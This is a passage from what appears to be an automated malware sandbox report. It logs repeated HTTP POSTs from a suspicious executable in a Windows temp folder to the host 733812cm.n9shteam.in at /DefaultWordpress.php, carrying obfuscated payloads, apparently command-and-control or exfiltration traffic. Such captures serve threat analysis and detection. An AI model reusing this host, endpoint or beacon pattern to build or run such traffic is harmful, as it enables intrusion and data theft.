                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11451&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=130110&cwnd=100&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:19:03.788907051 CEST | 788 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:03 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zzh57Nffn7WSthLPAOHcYrxV4w%2BmfokYOJGI87iJVLvYt6TQRwgc0LcjshVkbpaf0xr5yqKI6HitJmYPeHqY8SAG71Fs%2BOMulxEyMQjzdzr7fA%2B3V9WOIlLekDdvD74nouhRWj5BtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53c87808cf31-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11451&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=130110&cwnd=100&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          56 | 192.168.2.5 | 50035 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:03.808860064 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:04.166290998 CEST | 2528 | OUT | Data Raw: 5b 5a 5c 5f 5f 58 54 55 54 5b 52 57 50 58 57 51 50 59 5d 59 50 55 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Z\__XTUT[RWPXWQPY]YPUW[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ])012+# $<=#),7'>;[%'%'>+#F $P.,
                                                          Oct 20, 2024 18:19:04.591478109 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:04.960334063 CEST | 796 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YzeUIobkvIwUhgCtvf%2BHByvUhRtHg%2BdqfltiFcfcj8VpEzK0S7lCpZyZ3Xzk34XHINdwAW6vs%2Bpx8FYeDTJ%2BeYg5e%2Fx4mHaooLhDyf0eF%2FdsgkbowgPFvl1cgi%2F2z4aeQ44abVbeUA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53d12fd7fa8e-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11853&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=121110&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          57 | 192.168.2.5 | 50036 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:05.395267963 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:05.744406939 CEST | 2528 | OUT | Data Raw: 5e 5d 5c 53 5a 5b 51 51 54 5b 52 57 50 5d 57 50 50 5a 5d 5b 50 56 57 5d 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^]\SZ[QQT[RWP]WPPZ][PVW]\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#=31(%R++$V?X$)/'0[<&!Y'8*\0.^(#F $P.
                                                          Oct 20, 2024 18:19:06.171859026 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:06.400712967 CEST | 791 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:06 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NYfgkWk3jhD%2BhMj%2BCCq0XFHvS4runxe6HObNz123wREkbaNxWSmGoZ5oozFNATWpoLKDz%2B9JIogIFDl0E96O24TNvAsAA4%2BZMYEIuCZq5GMK14BsAaCo7KLl2XCyGYf%2FHm0rtkVkkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53db0c7d96cc-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11146&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=129923&cwnd=47&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          58 | 192.168.2.5 | 50037 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:06.753427029 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:07.103729010 CEST | 2528 | OUT | Data Raw: 5e 5d 5c 5c 5a 52 51 5c 54 5b 52 57 50 5d 57 51 50 5e 5d 59 50 5d 57 5a 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^]\\ZRQ\T[RWP]WQP^]YP]WZ\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ _)#Z%;-S(3#$6=.)<'?^113"0>"<#F $P.
                                                          Oct 20, 2024 18:19:07.567118883 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:07.803344011 CEST | 786 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:07 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7eR%2FtlHMGtEXQDCTBZVGReiNQFnvYEi1gJDcW3RD0MeDUo7UNMwvH9zUR%2BxN8SfynB4Ua9tgMfoCk05DtYUtDaKveTFonmlHV0Bt0gWnTxE2Om0w5XIHfKYLF9QnYnp1Nz8ZhMQVgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53e3cdacfb34-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13056&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=112676&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          59 | 192.168.2.5 | 50038 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:07.949949980 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:08.306811094 CEST | 1948 | OUT | Data Raw: 5b 5a 5c 5f 5f 58 51 50 54 5b 52 57 50 53 57 5c 50 59 5d 5f 50 50 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Z\__XQPT[RWPSW\PY]_PPW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ )U%^2?#/^'+>(\)<(X&-'%!03X$X)+#F $P.
                                                          Oct 20, 2024 18:19:08.743805885 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:08.956645012 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:09.120368958 CEST | 938 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:09 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59FF5DuH7uLYa%2BxznDdMw3uAzB321XHNg%2BeayvIV%2F87zObNApGlfxT52d0Xuptz3akLu%2FwcPzDlr8swySdC6F3YzugjJZJcQM03HzBD542CWJxZ7AgiBbT5pBJdW62MetA2C1wl2Gw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53eb1a772510-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=14135&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=111918&cwnd=73&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 25 03 33 01 01 1e 29 2f 28 57 2c 3e 3d 13 39 03 3c 02 2d 0f 25 5e 33 30 3a 58 31 5c 39 5c 25 30 3c 07 35 05 2a 5e 37 11 0f 54 39 36 28 5e 07 12 26 13 28 2f 33 05 2b 3d 3c 1b 3c 38 33 00 21 24 24 1c 32 03 27 53 25 3d 22 00 3d 1f 0c 01 29 2d 3d 09 39 1a 29 41 2e 3b 3f 01 20 00 22 53 03 13 25 1e 2a 0e 27 00 22 32 3c 06 3f 3d 27 5b 28 06 2a 1f 3e 30 37 5b 28 28 33 13 2d 3d 2e 10 24 06 3c 59 25 2c 23 05 32 04 2f 50 33 10 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98%3)/(W,>=9<-%^30:X1\9\%0<5*^7T96(^&(/3+=<<83!$$2'S%="=)-=9)A.;? "S%*'"2<?='[(*>07[((3-=.$<Y%,#2/P3$^-/W6[O0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          60 | 192.168.2.5 | 50039 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:08.256623030 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:08.603768110 CEST | 2528 | OUT | Data Raw: 5b 50 5c 58 5a 58 54 55 54 5b 52 57 50 53 57 5d 50 5c 5d 5f 50 57 57 5d 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [P\XZXTUT[RWPSW]P\]_PWW]\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ \)#.&]!+383)T=-?)/$,21<3.$->Y(:#F $P.
                                                          Oct 20, 2024 18:19:09.030966997 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          61 | 192.168.2.5 | 50040 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:09.248241901 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:09.603818893 CEST | 2528 | OUT | Data Raw: 5b 59 5c 59 5a 5b 54 57 54 5b 52 57 50 59 57 5c 50 50 5d 56 50 5c 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Y\YZ[TWT[RWPYW\PP]VP\W[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ) .%%T>0(0^%=>7=<$.'X21X393%(*#F $P.(
                                                          Oct 20, 2024 18:19:10.041174889 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:10.296482086 CEST | 793 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:10 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ArRUYKJP5WorRRI3ydAeWHvvBvIkhszC9yF%2FgwZKITX%2Bs4NTwpPakCO161R5l%2BtTwrpAd%2B%2FF%2BhiEHO2bRBoPLMcTXGJ2oT1tZRvcH1cozpomtkoufhCD94EymONtwYPV7mseZHqMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53f33fbb964a-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13059&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=100835&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          62 | 192.168.2.5 | 50041 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:10.772001982 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:11.119282961 CEST | 2528 | OUT | Data Raw: 5b 5b 5c 59 5a 5b 54 50 54 5b 52 57 50 58 57 51 50 5a 5d 58 50 57 57 5f 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [[\YZ[TPT[RWPXWQPZ]XPWW_\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ Y>09X&;%(708V<\)$$?[%^'=0>_+#F $P.,
                                                          Oct 20, 2024 18:19:11.577857971 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:11.945928097 CEST | 794 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:11 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FEgJKctASNZPSsat8lihYx3eklz5E7Ak7cV51WQ9ETWFq76LYXmOid3ziMytnIlqCxGcIU53dUuWys%2F6rAg%2Bclufg2NQw%2BzhoEIv9OZARKqv%2FeOFA9PIh%2BEP5eij0d815ZREz1G3Ww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53fcda4b67df-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13234&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=114015&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          63 | 192.168.2.5 | 50042 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:12.080239058 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:12.431759119 CEST | 2528 | OUT | Data Raw: 5b 5b 5c 5d 5f 58 51 55 54 5b 52 57 50 5d 57 56 50 5e 5d 56 50 57 57 5a 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [[\]_XQUT[RWP]WVP^]VPWWZ\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ >U&2;T> #08%V=>;> ]0#_1(3>%=6_+#F $P.
                                                          Oct 20, 2024 18:19:12.881131887 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:13.242223024 CEST | 785 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:13 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EPCT8JDb1TDXHSWPEG8AROHoRjshHUlo4uA6uNf65jcw4IgWeYdCLQDNzT0CrWw%2FgwFiEmH2woC9D73rD7o4tmxWIRQ0h0HqWL7jgAHhdWTdqx%2Fpd3fXyoeZxhYi6SNvq261J5zVAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5404fb3a2536-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12985&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=111780&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:19:13.464538097 CEST | 785 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:13 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EPCT8JDb1TDXHSWPEG8AROHoRjshHUlo4uA6uNf65jcw4IgWeYdCLQDNzT0CrWw%2FgwFiEmH2woC9D73rD7o4tmxWIRQ0h0HqWL7jgAHhdWTdqx%2Fpd3fXyoeZxhYi6SNvq261J5zVAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5404fb3a2536-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12985&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=111780&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          64 | 192.168.2.5 | 50043 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:13.678982973 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:14.025645018 CEST | 2528 | OUT | Data Raw: 5e 5b 5c 5c 5a 5f 51 5d 54 5b 52 57 50 59 57 51 50 59 5d 5a 50 52 57 59 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^[\\Z_Q]T[RWPYWQPY]ZPRWY\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ \)3=_%8-U<0(3+%<-4>?;0=;_&1#'2$-5<*#F $P.(
                                                          Oct 20, 2024 18:19:14.972954035 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:15.483171940 CEST | 787 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:15 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
